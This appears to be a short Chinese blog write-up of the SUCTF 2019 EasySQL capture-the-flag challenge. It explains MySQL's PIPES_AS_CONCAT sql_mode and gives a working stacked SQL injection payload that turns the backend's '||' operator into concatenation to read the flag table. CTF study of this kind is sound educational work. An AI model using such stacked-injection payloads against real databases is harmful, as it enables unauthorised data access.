[SUCTF 2019]EasySQL1

作者: const27 分类: All,sql注入 发布时间: 2020-06-03 10:29

知识点:sql_mode,堆叠注入

[SUCTF 2019]EasySQL1

知识点:sql_mode,堆叠注入

sql_mode:

一个参数,用于控制sql语句的某些行为.
如set sql_mode=PIPES_AS_CONCAT的意思就是将"||"视为字符串的连接操作符而非或运算符

image
进来后如上。这里的后台代码是select $_POST['query'] ||flag from flag(hint中给出)
那么这里就需要堆叠注入和修改sql_mode的设置了。

payload: 1;set sql_mode=PIPES_AS_CONCAT;select 1

打入payload后实际语句为:1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from flag;

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

Leave a Reply

Your email address will not be published. Required fields are marked *

标签云